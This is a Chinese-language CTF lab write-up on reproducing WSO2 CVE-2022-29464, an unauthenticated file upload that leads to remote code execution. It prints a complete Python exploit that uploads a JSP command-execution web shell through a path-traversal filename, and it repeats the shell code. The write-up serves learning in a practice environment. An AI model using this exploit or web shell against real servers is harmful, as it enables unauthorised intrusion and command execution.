靶标介绍
WSO2文件上传漏洞(CVE-2022-29464)是Orange Tsai发现的WSO2上的严重漏洞。该漏洞是一种未经身份验证的无限制任意文件上传,允许未经身份验证的攻击者通过上传恶意JSP文件在WSO2服务器上获得RCE。
靶场截图
靶场复现
访问靶标url
题目也给我们提示了 WSO2文件上传漏洞(CVE-2022-29464),直接去GitHub搜一个exp直接运行就行
GitHub地址:GitHub - hakivvi/CVE-2022-29464: WSO2 RCE (CVE-2022-29464) exploit and writeup.
使用指令:
python3 exploit.py url shell.jsp
然后访问如下图路径即可
然后在输入框里输入cat /flag 查看flag
exploit分析
import requests, urllib3, sys
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
if len(sys.argv) != 3:
print(f"Usage: python3 {sys.argv[0]} https://host shell.jsp")
exit()
host, file = sys.argv[1:]
shell = """<FORM>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>"""
files = {f"../../../../repository/deployment/server/webapps/authenticationendpoint/{file}": shell}
response = requests.post(f'{host}/fileupload/toolsAny', files=files, verify=False)
print(f"shell @ {host}/authenticationendpoint/{file}")
主要代码应该是下面这段代码
shell = """<FORM>
<INPUT name='cmd' type=text>
<INPUT type=submit value='Run'>
</FORM>
<%@ page import="java.io.*" %>
<%
String cmd = request.getParameter("cmd");
String output = "";
if(cmd != null) {
String s = null;
try {
Process p = Runtime.getRuntime().exec(cmd,null,null);
BufferedReader sI = new BufferedReader(new
InputStreamReader(p.getInputStream()));
while((s = sI.readLine()) != null) { output += s+"</br>"; }
} catch(IOException e) { e.printStackTrace(); }
}
%>
<pre><%=output %></pre>"""
通过这个shell上传了一个HTML表单来接收用户输入的命令,并在后端使用Java代码将该命令在系统中执行。
漏洞分析
这里大家直接去看大佬的文章我自己是分析不明白了:WSO2 API Manager 文件上传漏洞(CVE-2022-29464) 分析